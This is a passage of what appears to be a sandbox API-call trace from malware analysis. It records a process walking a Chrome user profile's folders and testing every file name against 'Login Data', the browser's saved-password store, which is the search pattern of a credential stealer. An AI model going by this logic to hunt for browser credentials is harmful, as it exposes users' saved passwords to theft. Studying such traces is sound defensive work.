returned 0 [0590.158] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.158] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.158] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0590.158] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.158] lstrlenW (lpString="\\") returned 1 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.158] lstrlenW (lpString="Cache") returned 5 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0x5ed228 [0590.158] LocalFree (hMem=0x5d1290) returned 0x0 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.158] lstrlenW (lpString="\\*.*") returned 4 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5ec478 [0590.158] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.158] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.158] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.158] lstrlenW (lpString="\\") returned 1 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.158] lstrlenW (lpString="data_0") returned 6 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec5a0 [0590.158] LocalFree (hMem=0x5d1290) returned 0x0 [0590.158] StrStrIW (lpFirst="data_0", lpSrch="Login Data") returned 0x0 [0590.158] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.158] lstrlenW (lpString="\\") returned 1 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.158] lstrlenW (lpString="data_1") returned 6 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec6c8 [0590.158] LocalFree (hMem=0x5d1290) returned 0x0 [0590.158] StrStrIW (lpFirst="data_1", lpSrch="Login Data") returned 0x0 [0590.158] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.158] lstrlenW (lpString="\\") returned 1 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.159] lstrlenW (lpString="data_2") returned 6 [0590.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.159] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec7f0 [0590.159] LocalFree (hMem=0x5d1290) returned 0x0 [0590.159] StrStrIW (lpFirst="data_2", lpSrch="Login Data") returned 0x0 [0590.159] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.159] lstrlenW (lpString="\\") returned 1 [0590.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.159] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.159] lstrlenW (lpString="data_3") returned 6 [0590.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.159] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec918 [0590.159] LocalFree (hMem=0x5d1290) returned 0x0 [0590.159] StrStrIW (lpFirst="data_3", lpSrch="Login Data") returned 0x0 [0590.159] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.159] lstrlenW (lpString="\\") returned 1 [0590.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.159] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.159] lstrlenW (lpString="index") returned 5 [0590.159] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.159] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5eca40 [0590.159] LocalFree (hMem=0x5d1290) returned 0x0 [0590.159] StrStrIW (lpFirst="index", lpSrch="Login Data") returned 0x0 [0590.159] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.159] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.160] LocalFree (hMem=0x5ec478) returned 0x0 [0590.160] LocalFree (hMem=0x5ed228) returned 0x0 [0590.160] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.160] lstrlenW (lpString="\\") returned 1 [0590.160] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.160] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.160] lstrlenW (lpString="Cookies") returned 7 [0590.160] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.160] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5ed228 [0590.160] LocalFree (hMem=0x5d1290) returned 0x0 [0590.160] StrStrIW (lpFirst="Cookies", lpSrch="Login Data") returned 0x0 [0590.160] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.160] lstrlenW (lpString="\\") returned 1 [0590.160] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.160] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.160] lstrlenW (lpString="Cookies-journal") returned 15 [0590.160] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.160] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ec478 [0590.160] LocalFree (hMem=0x5d1290) returned 0x0 [0590.160] StrStrIW (lpFirst="Cookies-journal", lpSrch="Login Data") returned 0x0 [0590.160] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.161] lstrlenW (lpString="\\") returned 1 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.161] lstrlenW (lpString="Current Session") returned 15 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ecb68 [0590.161] LocalFree (hMem=0x5d1290) returned 0x0 [0590.161] StrStrIW (lpFirst="Current Session", lpSrch="Login Data") returned 0x0 [0590.161] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.161] lstrlenW (lpString="\\") returned 1 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.161] lstrlenW (lpString="Current Tabs") returned 12 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ecc90 [0590.161] LocalFree (hMem=0x5d1290) returned 0x0 [0590.161] StrStrIW (lpFirst="Current Tabs", lpSrch="Login Data") returned 0x0 [0590.161] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.161] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0590.161] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.161] lstrlenW (lpString="\\") returned 1 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.161] lstrlenW (lpString="data_reduction_proxy_leveldb") returned 28 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b778 [0590.161] LocalFree (hMem=0x5d1290) returned 0x0 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.161] lstrlenW (lpString="\\*.*") returned 4 [0590.161] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.161] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5a1300 [0590.161] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrlenW (lpString="\\") returned 1 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c448 [0590.162] lstrlenW (lpString="000003.log") returned 10 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x150) returned 0x5f0218 [0590.162] LocalFree (hMem=0x56c448) returned 0x0 [0590.162] StrStrIW (lpFirst="000003.log", lpSrch="Login Data") returned 0x0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrlenW (lpString="\\") returned 1 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c448 [0590.162] lstrlenW (lpString="CURRENT") returned 7 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x14a) returned 0x5f0370 [0590.162] LocalFree (hMem=0x56c448) returned 0x0 [0590.162] StrStrIW (lpFirst="CURRENT", lpSrch="Login Data") returned 0x0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrlenW (lpString="\\") returned 1 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c448 [0590.162] lstrlenW (lpString="LOCK") returned 4 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x5f04c8 [0590.162] LocalFree (hMem=0x56c448) returned 0x0 [0590.162] StrStrIW (lpFirst="LOCK", lpSrch="Login Data") returned 0x0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrlenW (lpString="\\") returned 1 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c448 [0590.162] lstrlenW (lpString="LOG") returned 3 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5f0618 [0590.162] LocalFree (hMem=0x56c448) returned 0x0 [0590.162] StrStrIW (lpFirst="LOG", lpSrch="Login Data") returned 0x0 [0590.162] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.162] lstrlenW (lpString="\\") returned 1 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c448 [0590.162] lstrlenW (lpString="MANIFEST-000002") returned 15 [0590.162] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.162] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x5f0768 [0590.163] LocalFree (hMem=0x56c448) returned 0x0 [0590.163] StrStrIW (lpFirst="MANIFEST-000002", lpSrch="Login Data") returned 0x0 [0590.163] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.163] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.163] LocalFree (hMem=0x5a1300) returned 0x0 [0590.163] LocalFree (hMem=0x56b778) returned 0x0 [0590.163] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.163] lstrcmpiW (lpString1="Extension Rules", lpString2=".") returned 1 [0590.163] lstrcmpiW (lpString1="Extension Rules", lpString2="..") returned 1 [0590.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.163] lstrlenW (lpString="\\") returned 1 [0590.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.163] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.163] lstrlenW (lpString="Extension Rules") returned 15 [0590.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.163] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ecdb8 [0590.163] LocalFree (hMem=0x5d1290) returned 0x0 [0590.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.163] lstrlenW (lpString="\\*.*") returned 4 [0590.163] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.163] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5a1300 [0590.163] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrlenW (lpString="\\") returned 1 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5e6190 [0590.164] lstrlenW (lpString="000003.log") returned 10 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56b778 [0590.164] LocalFree (hMem=0x5e6190) returned 0x0 [0590.164] StrStrIW (lpFirst="000003.log", lpSrch="Login Data") returned 0x0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrlenW (lpString="\\") returned 1 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5e6190 [0590.164] lstrlenW (lpString="CURRENT") returned 7 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e62c0 [0590.164] LocalFree (hMem=0x5e6190) returned 0x0 [0590.164] StrStrIW (lpFirst="CURRENT", lpSrch="Login Data") returned 0x0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrlenW (lpString="\\") returned 1 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5e6190 [0590.164] lstrlenW (lpString="LOCK") returned 4 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e63f8 [0590.164] LocalFree (hMem=0x5e6190) returned 0x0 [0590.164] StrStrIW (lpFirst="LOCK", lpSrch="Login Data") returned 0x0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrlenW (lpString="\\") returned 1 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x5e6190 [0590.164] lstrlenW (lpString="LOG") returned 3 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5e6530 [0590.164] LocalFree (hMem=0x5e6190) returned 0x0 [0590.164] StrStrIW (lpFirst="LOG", lpSrch="Login Data") returned 0x0 [0590.164] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.164] lstrlenW (lpString="\\") returned 1 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63afc0 [0590.164] lstrlenW (lpString="MANIFEST-000001") returned 15 [0590.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.164] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c448 [0590.164] LocalFree (hMem=0x63afc0) returned 0x0 [0590.165] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0590.165] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.165] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.165] LocalFree (hMem=0x5a1300) returned 0x0 [0590.165] LocalFree (hMem=0x5ecdb8) returned 0x0 [0590.165] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.165] lstrcmpiW (lpString1="Extension State", lpString2=".") returned 1 [0590.165] lstrcmpiW (lpString1="Extension State", lpString2="..") returned 1 [0590.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.165] lstrlenW (lpString="\\") returned 1 [0590.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.165] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d1290 [0590.165] lstrlenW (lpString="Extension State") returned 15 [0590.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.165] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ecdb8 [0590.165] LocalFree (hMem=0x5d1290) returned 0x0 [0590.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.165] lstrlenW (lpString="\\*.*") returned 4 [0590.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.165] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63afc0 [0590.165] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.166] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrlenW (lpString="\\") returned 1 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63b0f8 [0590.166] lstrlenW (lpString="000003.log") returned 10 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56c590 [0590.166] LocalFree (hMem=0x63b0f8) returned 0x0 [0590.166] StrStrIW (lpFirst="000003.log", lpSrch="Login Data") returned 0x0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrlenW (lpString="\\") returned 1 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63b0f8 [0590.166] lstrlenW (lpString="CURRENT") returned 7 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5a1300 [0590.166] LocalFree (hMem=0x63b0f8) returned 0x0 [0590.166] StrStrIW (lpFirst="CURRENT", lpSrch="Login Data") returned 0x0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrlenW (lpString="\\") returned 1 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63b0f8 [0590.166] lstrlenW (lpString="LOCK") returned 4 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e6660 [0590.166] LocalFree (hMem=0x63b0f8) returned 0x0 [0590.166] StrStrIW (lpFirst="LOCK", lpSrch="Login Data") returned 0x0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrlenW (lpString="\\") returned 1 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63b0f8 [0590.166] lstrlenW (lpString="LOG") returned 3 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63b230 [0590.166] LocalFree (hMem=0x63b0f8) returned 0x0 [0590.166] StrStrIW (lpFirst="LOG", lpSrch="Login Data") returned 0x0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.166] lstrlenW (lpString="\\") returned 1 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x63b0f8 [0590.166] lstrlenW (lpString="MANIFEST-000001") returned 15 [0590.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.166] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c6d8 [0590.166] LocalFree (hMem=0x63b0f8) returned 0x0 [0590.166] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0590.166] FindNextFileW (in: hFindFile=0x5b9b50, 